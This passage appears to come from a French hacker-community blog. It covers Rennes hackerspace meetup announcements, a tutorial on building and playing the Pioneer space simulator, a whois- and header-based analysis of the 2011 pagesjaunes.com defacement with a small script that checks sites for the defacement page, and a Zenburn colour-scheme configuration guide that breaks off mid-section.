Voici l’annonce pour le troisième Whatever’Apéro qui se tiendra le vendredi 11 et
le samedi 12 mai 2012 à Rennes.

Quarante neuf jours après la deuxième édition (23 et 24 mars 2012) qui avait rassemblé plus
d’une quarantaine de personnes au hackerspace de Rennes autour de différents ateliers et conférences
concernant des sujets comme les darknets, les quadricopters, l’anonymat ou la neutralité
du net et qui avait été l’occasion pour toutes les personnes présentes de se rencontrer,
d’échanger et surtout de lancer des projets, il est l’heure d’annoncer cette nouvelle
rencontre.

Cette troisième édition du Whatever’Apéro s’oriente vers plus d’ateliers et surtout plus de
débats autour des sujets qui ont lancé cet évènement : la Neutralité des réseaux, le
respect de la vie privée et des autres libertés fondamentales.

Au programme de ces deux journées :
*PROGRAMME*
* Vendredi 11 mai 2012 :
− À partir de 19h : apéro-rencontre
− 19h45 : Key Signing Party (Apportez des languettes de papier avec votre
identité : Nom − adresse email − fingerprint de la clé GPG )
− 20h15 : Whatever’apéro (débat sur la Neutralité du Net, ACTA, la vie privée, …)

* Samedi 12 mai 2012 :
− 14h-15h : Conférence de FAI Maison, Fournisseur d’accès Internet associatif
Nantais, sur les FAI associatifs et la Fédération FDN
− 15h-16h : Conférence de Khe0ps sur les opportunités de financement de la
Commission européenne pour les projets lutant contre la censure et la surveillance
sur Internet mais également sur les vagues de recrutement qui ont lieux dans
certaines institutions.
− Toute la journée : Streaming audio/vidéo via Icecast
− Toute la journée : Pentesting et découverte réseau : recherche d’équipements
filtrants sur un réseau.
− Toute la journée (sous réserve d’encre) : Le retour de la Chaos Printer.

*LIEU*
Les ateliers et l’apéro auront lieu à l’Élaboratoire, à Rennes, 48 boulevard
Villebois-Mareuil, dans le premier bâtiment à l’entrée sur la gauche.
Localisation sur Open Street Map : http://osm.org/go/eri2Tysdq–

*TRANSPORTS*
Un parking est présent en face du 48 boulevard Villebois-Mareuil
En bus : − ligne 31 arrêt Chardonnet
− ligne 11 arrêt Cimetière de l’Est (à 3 minutes de marche)
− lignes 4 et 6 arrêt Pont de Strasbourg (à 3 minutes de marche)

Nous tenons à remercier l’Élaboratoire, hacknowledge, breizh-entropy et toutes
les personnes qui nous aident dans l’organisation de ces rencontres.

Toute aide pour préparer les locaux est la bienvenue ! (N’hésitez pas à me contacter en ce
sens).

Pour toute demande d’information, me contacter dans les commentaires en laissant votre adresse mail
dans le champs approprié.

Hydraze.

Bonjour,

Suite au succès du premier whatever’apéro du 10 février dernier, nous avons
le plaisir de vous convier à sa seconde édition le vendredi 23 mars suivie
d’une journée d’ateliers le samedi 24 mars prochain à Rennes.

Qu’est-ce que le whatever’apéro ou apéro-sans-nom ? C’est une rencontre
s’inspirant des « quadr’apéro » parisiens de La Quadrature du Net où les
sujets de discussions tournent autour de la neutralité du net, la liberté
d’expression sur Internet, le respect de la vie privée et autres libertés
fondamentales.

Au programme de ces deux jours :
*PROGRAMME*

* Vendredi 23 mars :
− À partir de 19h : whatever’apéro
− Pendant l’apéro : Key Signing Party

* Samedi 24 mars :
− 10h-12h : atelier/table ronde sur l’anonymat
− 13h-15h : atelier VPN (création et utilisation)
− 15h-17h : atelier sur les DarkNet (dn42, anonet, tor, i2p, Freenet, Tinc)
− Toute la journée : atelier quadricopter / live stream video
− Toute la journée : atelier soudure/montage de TV-B-Gone

À noter qu’un concert est organisé à l’Élaboratoire le soir même juste
à côté de là où auront lieux les ateliers, à prix libre, à partir de
19h :
« Organisée par l’association et Label indé L’@utre F@ce, « SoNoriTés
AnOnYmEs » continue à s’inscrire dans une volonté de mieux faire
connaître des Expressions Musicales pas assez mises en avant, toujours
avec ce désir d’ouverture … et de partager avec le public … Djs /
Concerts / Perf … »

*LIEU*
Les ateliers et l’apéro auront lieu à l’Élaboratoire, à Rennes, 48 boulevard
Villebois-Mareuil, dans le premier bâtiment à l’entrée sur la gauche.
Lien openstreetmap

*TRANSPORTS*
Un parking est présent en face du 48 boulevard Villebois-Mareuil
En bus : − ligne 31 arrêt Chardonnet
− ligne 11 arrêt Cimetière de l’Est (à 3 minutes de marche)
− lignes 4 et 6 arrêt Pont de Strasbourg (à 3 minutes de marche)

Pour plus d’informations ou plus de détails sur le programme, vous pouvez
consulter cette page :
http://wiki.breizh-entropy.org/wiki/Whatever_apero_23/24_mars_2012

En cas de questions plus précises, n’hésitez pas à me contacter [en commentaire sur ce blog].

Enfin, je tiens à remercier l’Élaboratoire, wanda, axx, hacknowledge,
breizh-entropy et le kreizenn dafar, sans qui nous n’aurions pu organiser cet
évènement.

À bientôt,
Hydraze.

Nos données qui êtes dans le réseau,
Que vos bits soient sanctifiés,
Que votre disponibilité vienne,
Que votre redondance soit faite,
Sur le réseau comme sur les disques,
Donnez-nous aujourd’hui nos informations de ce jour,
Pardonnez-nous leurs offenses,
Comme nous pardonnons aussi à ceux qui ne savaient pas,
Et ne nous soumettez pas à la censure,
Mais libérez nous d’elle.

Datalove.

Les plus vieux d’entre vous se rappelleront peut être Elite et surtout ses suites, Frontier: Elite et Frontier: First encounter, développés à l’époque par David Braben. Frontier, c’était une galaxie composé de millions de systèmes solaires générés procéduralement, chacun possédant ses caractéristiques (nombre de planètes – elles aussi générées procéduralement,etc) et respectant les lois de la physique newtonienne (on pouvait se mettre en orbite d’une planète « à la main », le modèle de vol n’était pas « arcade » mais réaliste (en gros, non, on ne peut pas freiner de 3000 kilomètres par seconde à zéro instantanément – à moins de s’écraser comme une bouse sur la première planète venue, et si on se colle à 10 km/s, et qu’on coupe les moteurs, dans le vide, eh bien on reste à 10km/s (à moins d’être à proximité du champ gravitationnel d’un corps céleste).

Dans Frontier, on pouvait donc visiter un nombre important de systèmes solaires, se poser sur des planètes terraformées ou sur de simples astéroïdes, se servir de la gravité pour accélerer, faire du commerce, de la piraterie, des missions militaires ou d’assassinat, du taxi, etc. Un univers entier au bout du clavier!

Eh bien Pioneer, c’est un jeu qui s’inspire de Frontier, en version « actualisée »: tout est généré procéduralement, de la galaxie aux canyons d’Io. Et en plus, c’est ‘achement joli

I. Installation de pioneer.
Rien de bien difficile en l’occurrence. Vous aurez besoin de git, normalement disponible sur les dépôts de votre distribution, pour l’installer sur architecture 64 bits. Les versions linux 32bits, windows (fear!) et Mac OS X sont disponibles sur le site de pioneer:

http://pioneerspacesim.net/

Cependant, l’avantage avec git, c’est de pouvoir compiler directement le source à partir de la branche master, et ainsi de profiter des toutes dernières nouveautés non disponibles dans l’alpha précédente (en l’occurence, l’alpha 13), les développeurs étant très actifs (et pour papoter de temps en temps avec eux sur irc, de vrais fans d’astronomie, de simulation spatiale et, ce qui ne gâche rien, très sympas!). Bon, ce qui suit est grosso modo une traduction du tuto disponible en anglais sur leur wiki ( http://pioneerspacesim.net/wiki/index.php?title=Compiling_pioneer ).

Bon, tout d’abord, cloner le dépôt git:

git clone git://github.com/pioneerspacesim/pioneer.git

Environ 250Mo, rien de bien méchant, le tout rangé dans un répertoire « pioneer » (sans dec’ )

Il vous faudra les dépendances suivantes:

libsigc++-2.0-dev libglut3-dev libglew1.5-dev libsdl1.2-dev libvorbis-dev libsdl-image1.2-dev dh-autoreconf git libfreetype6-dev et bien sûr git et autoconf!

(Normalement déjà installées sous Arch, et dispos sur les dépôts de votre distro préférée )

Par défaut, vous serez sur la branche master, si vous désirez compiler une release « stable », par exemple l’alpha14 (la dernière en date):

cd pioneer

git checkout alpha14

La compilation proprement dite:

cd pioneer

./bootstrap

./configure

make

Puis un simple:

ln -s ../data ./src/data

Puis, il ne reste plus qu’à lancer pioneer:

./src/pioneer

Et maintenant, passons – enfin – à la partie intéressante: le JEU!

II- Comment je décolle?
Bon, déjà, avant toute chose, au lancement vous aurez un menu assez basique, avec plusieurs positions de départ (La Terre, Système Sol et Epsilon Eridani, le debug point lui… porte bien son nom ). Pour commencer, partons donc de la Terre (bin ouais, soyons un peu chauvins quand même ).

Vous vous trouverez donc posé sur le spatioport de Brasilia, dans un Eagle MKII flambant neuf que… nous allons revendre directement! Bon, pour vous simplifier la vie, sachez que la combinaison Ctrl-M vous permet d’augmenter le nombre de crédit dont vous disposez, et comme le jeu est encore en alpha, pas de missions d’assassinat payées 30.000 crédits, ni de routes commerciales vraiment rentables (mais ça va venir, les missions d’assassinat sont en test, ainsi que les mission type « rendez-vous »). Donc, appuyez une bonne dizaine de fois sur Ctrl-M histoire d’avoir un ou deux millions de crédits (oui, un vaisseau, ça coûte cher, son équipement aussi, surtout si vous prenez un accélérateur à plasma comme arme principale… Et oui, tricher saylemal, mais pour le moment, on teste un jeu qui n’est pas encore terminé). Si le décor vous semble vide au début, laissez mouliner un peu le temps que le logiciel génère l’environnement proche – vous n’aurez pas ce problème en descendant de l’orbite basse d’une planète jusqu’à ce joli canyon où vous vous feriez bien un remake de la Tranchée de SW:Episode 4, vu que le logiciel génèrera au fur et à mesure l’environnement. Mais là, comme on vient juste de lancer le jeu à la surface d’une planète, il vaut mieux le laisser mouliner un peu. Ici, sur un vieux Core2Duo 2GHz/2Go de RAM de 2008 avec une petite nvidia GT220 1Go, je joue sans problème avec le niveau de détail very high pour les planètes et High pour les villes/spatioports, textures des planètes ON, Fractals Details Very High (ça, c’est dans la alpha15-dev ).

Maintenant, appuyez sur F4 pour afficher le menu du spatioport/station orbitale où vous vous trouvez. Vous allez vous retrouver en face de cet écran (pas très joli, mais bon, c’est une alpha, le reste est bien plus joli):

Plusieurs options:

• Request Launch: autorisation de décollage!!!
• Shipyard: Chantier naval, c’est là qu’on va acheter et équiper notre nouveau vaisseau!
• Commodities market: la Bourse! c’est là que vous achèterez votre carburant (Hydrogène pour une propulsion classique, carburant militaire pour une propulsion… militaire), différents produits légaux dans ce système (eh oui, certains systèmes acceptent le trafic d’esclaves ou de narcotiques, pas d’autres)
• Bulletin Board: c’est là que vous pouvez récupérer différentes missions, acheter sur le marché noir, ou donner des thunes à des œuvres de « charité » (dont l’utilité est nulle pour le moment, mais qui devraient avoir leur importance dans le scénario du jeu par la suite)
• Contact local police: pour payer vos amendes pour, par exemple, piraterie et meurtre, délit de fuite, utilisation prohibée d’une arme à proximité d’une station orbitale, largage de produits radioactifs dans l’atmosphère d’une planète peuplée, etc… Ah oui, une propulsion militaire transforme le carburant militaire en produits radioactifs, pensez donc à vider votre soute de ces saloperies à l’entrée dans un nouveau système…

Bon, normalement, avec le tip Ctrl+M vous devez avoir suffisamment de thunes pour vous payer un vaisseau potable. Direction « Shipyard » donc, puis « New & Reconditionned ships ». Je vous conseille de choisir un vaisseau du style Cobra MKIII, ASP Explorer, Viper Defence Craft, Constrictor – enfin bref, quelque chose entre 55 et 120 tonnes de soute. Par exemple ici, un bon vieux Cobra MKIII.

Une fois votre nouveau joujou acheté… Eh bien, mis à part une propulsion classique, vous êtes à poil (même pas de bouclier atmosphérique! Désintégration (lente) assurée à l’approche d’une planète pourvue d’une atmosphère!). Pas de lézard, direction « Ship Equipment » dans le menu. Ici, j’équipe mon bon vieux Cobra MKIII comme suit:

• Atmospheric Shielding: bouclier atmosphérique – j’ai pas envie de finir en brochette!
• Scanner: permet de visualiser l’environnement proche (<1000 km si je ne me trompe): vaisseaux, stations spatiales…
• Advanced ECM System ou ECM System: pas vraiment utile pour le moment, mais bon, si jamais la police vous canarde avec des missiles navals, vous serez heureux de posséder un système de contremesure!
• Un seul Shield Generator: ça peut toujours servir – dans un vaisseau plus gros, genre >1000 tonnes, j’en collerai une quinzaine – même plus besoin de tirer sur les pirates, suffit de leur rentrer dans le lard!
• Autopilot: lui, vous allez en avoir besoin! l’espace c’est GRAND! les distances sont énormes, et une planète, c’est PETIT!
• Radar Mapper.
• Hypercloud Analyzer: l’outil préféré de l’assassin. Permet de locker le nuage hyperspatial d’un vaisseau en fuite pour connaître sa destination. Et si vous avez une meilleure propulsion que lui, vous arriverez AVANT lui dans le système où il s’enfuit.
• Personnellement, je revends toujours ma propulsion hyperdrive standard pour la remplacer par la propulsion militaire de classe supérieure: dans le cas du Cobra MKIII, une propulsion militaire Classe 4 me donne un rayon d’action de 30 années lumières environ, consomme moins et surtout est plus rapide pour 10 tonnes de plus que la propulsion hyperspatiale standard de classe 3: tout bénef pour un assassin ou un militaire!
• un laser 2MW à l’avant, un laser 1MW à l’arrière: suffisant pour le moment, mais à remplacer par un laser 4MW si la profession de tueur à gages vous botte (mais bon, pour le moment, pas de missions d’assassinat)

Et voilà un bon petit vaisseau parfait pour faire de l’exploration sans prendre trop de risques. Maintenant, on décolle!!

Toujours dans le menu du spatioport, sélectionnez « Request Launch », puis, directement après, appuyez sur F5 pour passer en mode « set speed », et F6 pour rentrer votre train d’atterrissage (pensez à le sortir à chaque atterrissage, et à le rentrer à chaque décollage…).

Normalement, vous devriez voler à environ 50 mètres par seconde en ligne droite, parrallèle au sol, à une 100aine de mètres d’altitude.

Pour augmenter votre vitesse désirée, appuyez sur la touche Entrée, pour diminuer la vitesse désirée, touche shift de droite. Calez vous à 300 mètres par seconde. Vous verrez que votre vaisseau accélèrera jusqu’à ce que la vitesse atteigne 300 m/s. Pour contrôler l’orientation de votre vaisseau, deux possibilités:

• clic droit de la souris maintenu, puis bouger la souris.
• les touches azeqsd (pensez à les configurer dans les options (touches Esc): A et E gère le pitch roll (vous tournez sur votre axe), z et s gère l’orientation « haut/bas » et q et d « gauche/droite »

Allez, on est presque prêts à faire notre premier voyage intra système vers, disons, Mars. Pour celà, relevez le nez de votre appareil, et accélérez à disons… 5 km/s. Maintenant, nous allons accélérer le temps, grâce aux icônes en bas à gauche (||, >, >>,…, >>>>>). Cliquez sur « >> » pour multiplier le temps par environ 10, appuyez sur F1 pour cycler les différentes vues disponibles et voir cette bonne vieille Terre s’éloigner…

Pour sélectionner Mars, rien de plus simple, cliquez dessus (son nom doit apparaître, si ce n’est pas le cas, appuyez sur F8). Puis appuyez sur F4, vous devriez obtenir quelque chose de ce style:

Et là, merci l’autopilote, à gauche, il nous propose d’entrer sur plusieurs orbites autour de Mars, et à droite, nous avons la liste des spatioports de ce système solaire. Rien ne vous empêche d’aller vous coller en orbite de Mars à la main (c’est d’ailleurs un bon entraînement!), mais ce serait un peu long à expliquer! cliquez sur « Enter Low Orbit around Mars », l’autopilote s’occupera de tout pour vous! Accélerez le temps à fond, laissez mouliner jusqu’à l’arrêt des moteurs: vous êtes en orbite martienne (Eh oui, Mars a été terraformée pour l’occasion!).

C’est beau, hein? Comme vous êtes en contrôle manuel, et dans le vide, tant que vous ne touchez à rien, vous êtes en orbite basse, à environ 3km/s. Augmentez la vitesse du temps pour voir le moteur physique à l’œuvre: et oui, vous tournez autour de la planète! n’hésitez pas à utiliser zqsd pour orienter le vaisseau et profiter du panorama, parceque la prochaine étape va être de se POSER sur Mars (enfin sur un spatioport martien). Comme il est si bien dit dans le Guide Galactique (le bouquin, pas le pseudo film, hein!): PAS DE PANIQUE! Je vais vous expliquer la méthode « douce » ou du moins, la plus sûre à mes yeux, pour atterrir en douceur – il y en à d’autres limite suicidaires, mais ça, je vous laisserai les découvrir! -. On va d’abord laisser tourner un peu le vaisseau autour de la planète pour repérer le spatioport qui nous intéresse, le locker, puis tranquillement rentrer dans l’atmosphère et décélérer en douceur.

Dans mon cas, j’ai choisi le spatioport d’Olympus Mons. Laissez tourner le vaisseau en orbite jusqu’à ce que vous soyez à environ 2000km de votre objectif. Orientez vous vers le spatioport, puis appuyez sur F5 pour repasser en mode « Set Speed ». Comme vous êtes déjà à 3km/s autour de Mars, les moteurs se contenteront de vous recaler à cette vitesse dans la bonne direction. Accélérez le temps, tout en vous rapprochant d’Olympus Mons (ou de tout autre spatioport que vous aurez choisi). Lorsque vous êtes à environ 200km d’altitude, diminuez votre vitesse aux alentours de 2km/s (touche shift droite!). Notez que votre vaisseau se comporte comme une brique volante: il lui faut du temps pour décélérer, il est donc très important d’anticiper!!! Gardez le cap, réduisez votre vitesse progressivement pour être aux alentours de 200m/s à une dizaine de kilomètres de votre objectif. Repassez en « temps normal »!! C’est le moment de contacter la tour de contrôle pour leur demander l’autorisation d’atterrir: appuyez sur F4:

Sélectionnez « Request Docking Clearance ». La tour de contrôle vous indiquera sur quelle « piste » vous poser (par exemple, « Dock 1″. Continuez votre approche en douceur, pour vous positionner au-dessus du dock, sortez votre train d’atterrissage!, et positionnez vous à l’horizontale à une cinquantaine de mètres au dessus du dock, à une vitesse de… 0 m/s! Appuyez sur F5 pour couper les moteurs, puis laissez tranquillement la gravité faire son job de… gravitation. Et voilà! Notez que l’autopilote peut s’en occuper tout seul comme un grand… mais bon, autant pour une station spatiale je lui fais confiance, autant quand j’ai une boule de 2000km de rayon en dessous de moi, je préfère prendre les choses en main tout seul comme un grand!

Allez, prochaine étape, hyperespaaaace!

III. Vers l’infini et au delà.
Dans ce dernier chapître, relativement court,  je vais vous montrer comment voyager dans la galaxie. Une fois posé, appuyez sur F2. La carte galactique devrait apparaître:

Eh oui, c’est immense, et vous ne voyez qu’une toute petite portion de la galaxie (pour vous faire une idée de la taille, appuyez sur F8). Avec la souris, ou les flèches du clavier, sélectionnez un système habité (indiqués par « Some established mining » ou « Thriving outdoor world » par exemple. Les systèmes indiqués « no registered settlement » sont tout à fait explorables, mais ne possèdent pas de spatioport! pensez à faire le plein!!). Si vous voulez voir la description du système sélectionné, appuyez sur F7, et si vous voulez voir le système lui même, F6. Notez que F7 permet de sélectionner une planète comme lorsque nous avons sélectionné Mars: en cliquant dessus! Très pratique à l’entrée dans un système, pour régler l’autopilote directement sur la planète qui nous intéresse (en effet, à l’entrée dans un système, vous êtes loin de tout objet, et, par exemple, les petites planètes proches de l’étoile n’apparaissent pas forcément sur l’écran de jeu (trop petites)). Notez aussi la petite boîte de recherche en bas à droite, très pratique en cas de mission…

Une fois votre destination sélectionnée, appuyez sur F1 pour revenir à l’écran de jeu, décollez, attendez un peu puis appuyez sur F7 pour passer en hyperespace. Notez que plus vous avez choisi une destination éloignée, plus vous consommerez de carburant et plus le temps passé en hyperespace sera long.
De même, pensez à vérifier votre rayon d’action hyperspatial (touche F3 pour afficher les différentes caractéristiques du vaisseau, ce que vous avez en soute, vos missions, etc…).

Et voilà! C’est fini pour cette petite présentation de Pioneer Space Simulator, un jeu qui devient de plus en plus intéressant au fur et à mesure de son développement. J’espère vous avoir donné envie de le tester, et bon jeu à vous!

En cette douce fin d’après-midi du 5 juillet, nous avons pu voir sur twitter et irc de nombreux liens vers le site pagesjaunes.com avec des commentaires comme « Pages jaunes hacké ! », « pages jaunes piraté ! » ou pour certains « pages jaunes hacked ». Pourtant, au dela du nom de domaine, il n’y a aucune trace de pagesjaunes.fr et de nombreux éléments troublants apparaissent.

Les faits

Comme dit un peu plus haut, pagesjaunes.com a « buzzé » après la découverte de son défaçage par un groupuscule pakistanais de script kiddies (screen). Une analyse rapide de la page nous montre qu’il s’agit d’une page en html, avec un petit bout de javascript bidon et une vidéo youtube incorporée (qui est d’ailleurs bloquée).


% file index.html
index.html: HTML document, Non-ISO extended-ASCII text, with CRLF line terminators


Comme on peut le voir ci dessus, ce document a été créé, au moins en partie (présence de CRLF pour terminer les lignes), sous windows.
De plus, dans les en-têtes HTTP envoyés par le serveur, on peut voir ceci :


Last-Modified: Sat, 02 Jul 2011 10:13:07 GMT


La page date donc au moins du Samedi 2 Juillet 2011 à 10h13 (GMT).

Voilà pour les faits.

Pas de pagesjaunes.fr

Nous avons trois informations principales qui nous amènent à dissocier totalement le site pagesjaunes.com du français
pagesjaunes.fr.

• La première information provient d’un simple whois sur les deux noms de domaines à titre comparatif. Alors que pagesjaunes.fr affiche ceci, pagesjaunes.com affiche lui ceci. On voit donc nettement la différence. Les domaines n’appartenant pas aux mêmes personnes.
• Le deuxième point est quand à lui judiciaire, comme on peut le voir ici et ici, pagesjaunes.com a été attaqué à plusieurs reprises par pagesjaunes.fr pour diverses raisons, s’en est suivi une interdiction d’utilisation du domaine pagesjaunes.com. De part l’interdiction d’utilisation, il est donc bizarre de voir ce nom de domaine ressurgir ainsi. Vous pouvez également noter qu’il n’y a aucune trace de pages pour ce nom de domaine sur google.
• Le troisième point est celui des ip, pagesjaunes.fr pointe vers 193.252.242.25 et 193.252.242.125 (merci le round robin pour faire de la répartition de charge). Notez également que via un whois sur ces adresses ip, on peut voir qu’elles appartiennent à France-Télécom/Orange. Concernant pagesjaunes.com, tout est différent. Ce domaine pointe vers l’ip 64.13.232.176, le reverse de cette ip est acmkoieeoc.gs02.gridserver.com (notez bien ce domaine).

Ainsi, vous avez pu voir que ce « défaçage », n’était en rien lié à pagesjaunes.fr contrairement à ce qui était annoncé et relayé sur twitter, irc, facebook ou autre. Je sais que vous n’êtes pas là que pour ça, passons donc à une analyse plus technique de ce défaçage.

Analyse approfondie

Et si on cherchait une porte d’entrée ?

Une petite recherche sur google nous apprend que ce groupuscule n’en est pas à son coup d’essai. Penchons nous un peu sur les résultats de cette recherche, on y trouve de nombreux sites dont un, hostels.france.com, qui attire mon attention, de part son nom. Un petit coup d’host et on retrouve la même ip et le même reverse que précédemment. En tapant gs02.gridserver.com dans son navigateur, on tombe sur mediatemple.net, un hébergeur. On peut donc en déduire que acmkoieeoc.gs02.gridserver.com est un serveur d’hébergement mutualisé. Deux sites piratés par le même groupuscule sur une même plateforme d’hébergement, regardons si le chiffre n’est pas supérieur… Demandons à robtex de nous fournir une liste de noms de domaines à cette ip, nous obtenons ceci. Comme vous je suis faignant, j’ai donc fait un petit script qui, à partir de cette liste partielle (hostels.france.com n’y est pas, on peut donc penser que de nombreux autres sites n’y sont pas référencés), va regarder si cette page de défaçage est présente. Le script en question :

#!/bin/bash
while read url
do
echo -n "$url :"
wget -q -O- $url | grep "Hacked By KiLLerMiNd" > /dev/null 2>&1 && echo -e "33[1;31m yes 33[0m" || echo -e "33[1;32m no 33[0m"
done


On se fait un fichier contenant un nom de domaine par ligne, et on appelle le script comme ceci :

./check.sh < hosts


Ce script affiche un « yes » rouge si le site est défacé et un « no » vert s’il ne l’est pas, rien de bien compliqué. Concernant les résultats, nous avons ainsi pu voir que seul le site amerique.com était lui aussi défacé à l’heure actuelle. Cela nous fait donc un total de 3 sites piratés par ce groupuscule, ça commence à faire beaucoup. Regardons les headers HTTP. Surprise, nous retrouvons un header Last-Modified sur hostels.france.com, d’après lui la page a été modifié le…
Last-Modified: Sat, 02 Jul 2011 10:13:07 GMT
Bingo ! La même seconde que pour pagesjaunes.com. De là plusieurs hypothèses : le header est faux/erroné, c’est une pure coincidence ou un site chez cet hébergeur s’est fait pirater et ce groupuscule en a profité, via une politique de sécurité défaillante chez cet hébergeur, pour défacer d’autres sites hébergés.

C’est ici que se finit ce retour, je vous laisse faire votre propre conclusion concernant ce mini-buzz qui au final cachait quand même quelques petites surprises.

I- Zenburn, c’est quoi donc ça?

Zenburn, c’est un ensemble de couleurs dites « low contrast », qui, si vous travaillez dans la pénombre, dans le noir, ou tout simplement si votre nouvel écran oled de la mort qui tue vous éclate les yeux, permet de moins se fatiguer la vue sur la durée. Les fonds sont en général gris (#3f3f3f) et les couleurs relativement peu « flashy » – le blanc, par exemple, ne sera pas un vilain #ffffff prompt à vous envoyer chez l’ophtalmo le plus proche (qui se frotte déjà les mains à l’idée de vous annoncer une myopie, voire une crémation au 3ème degré de votre rétine… ) mais une couleur plus « soft », moins contrastée mais tout de même lisible (#dcdccc dans le cas du blanc).

Il existe des thèmes zenburn pour presque chaque élément de votre desktop, et même des CSS zenburn à utiliser avec votre navigateur favori – même si dans ce cas, il peut être utile de le désactiver pour certains sites, comme linuxfr.org par exemple). C’est à dire qu’il existe des thèmes zenburn pour gtk2, pour votre terminal chéri, pour votre window manager – openbox par exemple, mais aussi awesomeWM (merci anrxc, dont je ne saurais que trop vous conseiller la lecture du site – lien en fin d’article), XMonad (on ne peut plus simple: 2 couleurs), et j’imagine, bien entendu, xfce/gnome/kde/lereste, sans compter quelques réglages pour dmenu, dzen2, xmobar…

Dans la suite de cet article, je vais vous détailler les configurations pour les logiciels suivants:

• urxvt (paquet rxvt-unicode256colors, important pour vim!) et plus globalement les réglages à effectuer dans .Xdefaults (bin oui, une xclock zenburn, c’est ‘achement plus classe que le machin noir & blanc de base)
• vim (très simple, il existe une coloration syntaxique zenburn)
• gtk2 – je ne rentrerai pas trop dans les détails, dans ce cas, je me contenterai, tout comme pour Vimperator, de vous fournir un lien vers les thèmes en question, qui ne sont pas bien méchants à installer)

II- Les codes couleurs Zenburn de base.

Voici donc les codes couleurs des 16 couleurs de base, en mode zenburn, plus le background et le foreground:

• background: #3f3f3f
• foreground (white): #dcdccc (mais #afafaf peut être utile, ça dépend de la luminosité de votre (vos) écran(s))
• noir: #1e2320
• rouge: #705050
• vert: #60b48a
• jaune: #dfaf8f
• bleu: #506070
• violet: #dc8cc3
• cyan: #8cd0d3
• blanc: #dcdccc
• noir brillant: #709080
• rouge brillant: #dca3a3
• vertquipète: #c3bf9f
• jaunefluo: #f0dfaf
• bleu brillant: #94bff3
• violet pétant: #ec93d3
• cyan brillant: #94bff3
• blanc brillant, aussi appellé « l’arrache rétine »: #ffffff

Comme vous avez sûrement dû le voir, les couleurs utilisées, mis à part l’arrache rétine, sont plutôt soft et n’arrachent pas les yeux – le fond relativement sombre (gris) permettant à ces couleurs de ressortir sans pour autant « aveugler » l’utilisateur.

III – C’est bien gentil tout ça, mais je vais pas me les taper à la main non plus?

Non, du moins, pas pour les logiciels précités, je les ai tapés à votre place, tas de fainéants! Dites vous, cependant, que ça ne prend en général que quelques minutes pour configurer, par exemple, XChat2 afin qu’il utilise ces codes couleurs et pas l’horrible blanc qui tue sur noir d’encre, et que vos yeux vous remercierons – notons au passage que zenburn n’est pas le seul colorscheme « low contrast ».
Attaquons nous déjà au .Xdefaults, fichier qui doit normalement se trouver dans votre $HOME. Tout d’abord, le terminal – je vous conseille au passage zsh comme shell par défaut, mais ça j’y reviendrai dans un autre article – dans mon cas, urxvt:

urxvt.font: xft:Terminus:size=8
urxvt.termName:  rxvt-256color
urxvt.loginShell:         true
urxvt.scrollBar:         false
urxvt.secondaryScroll:    true
urxvt.saveLines:         65535
urxvt.cursorBlink:       false
urxvt.urgentOnBell:       true
urxvt.override-redirect: false
!urxvt.borderLess:       false
!urxvt.borderWidth:          1
!urxvt.internalBorder:       0
!
! Extensions
urxvt*perl-lib:         /usr/lib/urxvt/perl/
urxvt*perl-ext-common:  default,matcher,searchable-scrollback
urxvt*urlLauncher:      /usr/bin/firefox
urxvt*matcher.button:   1
! pour ne pas louper une url
urxvt.cutchars:         `()’*<>[]{|} »
URxvt*cutchars:         ` »()’*<>[]{|}

! Curseur
urxvt.cursorColor: #DCDCCC

urxvt*background:  #3F3F3F
!urxvt*foreground:  #dcdccc
urxvt*foreground:  #dcdccc

! black + red
! !urxvt*color0:     #3f3f3f
urxvt*color0:      #1E2320
urxvt*color1:      #705050
! ! green + yellow
urxvt*color2:      #60b48a
urxvt*color3:      #dfaf8f
! ! blue + purple
urxvt*color4:      #506070
urxvt*color5:      #dc8cc3
! ! cyan + white
urxvt*color6:      #8cd0d3
urxvt*color7:      #dcdccc
! ! bright-black + bright-red
urxvt*color8:      #709080
urxvt*color9:      #dca3a3
! ! bright-green + bright-yellow
urxvt*color10:     #c3bf9f
urxvt*color11:     #f0dfaf
! ! bright-blue + bright-purple
urxvt*color12:     #94bff3
urxvt*color13:     #ec93d3
! ! bright-cyan + bright-white
urxvt*color14:     #94bff3
urxvt*color15:     #ffffff
!

Petite note : dans le .Xdefaults, ! est l’équivalent du #. De plus, il y a quelques prérequis si vous voulez utiliser urxvt: rxvt-unicode256colors normalement dispo sur les dépôts de votre distro, et la fonte Terminus, si vous voulez utilisez celle-ci – elle aussi, disponible sur vos dépôts normalement – mais rien ne vous empêche d’en utiliser une autre. Petit truc sympa, urxvt utilise xft. Bien sûr, si vous utilisez un autre terminal, comme xterm, il faudra adapter la config’ en question – voire adapter la palette de couleur dans les bidules genre roxterm ou gnome terminal (mode troll: utilisez plutôt un VRAI émulateur de terminal)

Xclock maintenant, bien plus simple:

xclock*update:     1
xclock*Mode:       analog
xclock*Background: #3F3F3F
xclock*Border:     #3F3F3F
xclock*Foreground: #F0DFAF

Il existe aussi des adaptations pour xfontsel ou xcalc, mais elles ne sont pas terribles: il reste toujours un vieux fond blanc qui pète :/

N’oubliez pas un petit xrdb .Xdefaults afin que le serveur X prenne en compte les nouveaux paramètres – ça vous évitera de vous délogger/relogger

Bon, ça, c’est fait, on va pouvoir passer à un autre morceau, pas bien dur ce coup-ci: Vim (et son pote gVim dans la foulée )

Tout d’abord il va falloir récupérer zenburn.vim ici: http://www.vim.org/scripts/script.php?script_id=415 et le placer dans votre répertoire ~/.vim/colors/. Vous pouvez déjà le tester dans vim en tapant :colorscheme zenburn – pour l’utiliser définitivement, rajoutez la ligne:

colorscheme zenburn

dans votre fichier ~/.vimrc

Attention, si vous n’utilisez pas un terminal 256 couleurs, vous risquez d’avoir quelques problèmes

IV- GTK, CSS, Vimperator.

Donc, en ce qui concerne GTK (2, pas 3 pour le moment :/), il suffit de télécharger la config zenburn et de la charger dans lxappearance, par exemple. Elle se trouve ici:

http://gnome-look.org/content/show.php/Zenburn+GTK?content=100628

En ce qui concerne la CSS Zenburn pour Firefox, voici ma version quelque peu modifiée, à charger avec, par exemple, l’addon Stylish:

http://pastebin.com/Z5iEhpZB

Attention, cette CSS peut parfois produire des résultats étranges sur certains sites, mais elle fonctionne relativement bien sur la majorité des sites que je visite quotidiennement – sauf trollf^Wlinuxfr

Pour les utilisateurs de l’excellent plugin Vimperator pour Firefox:

http://pastebin.com/J3bbnRFw

Il suffit ensuite de le copier dans le fichier ~/.vimperator/colors/zenburn.vimp – un petit :colorscheme zenburn (n’oubliez pas la tab-completion de vimperator ) pour voir ce que ça donne

Et pour finir, Zathura, lecteur pdf – dans son fichier ~/.config/zathura/zathurarc, copiez les lignes suivantes:

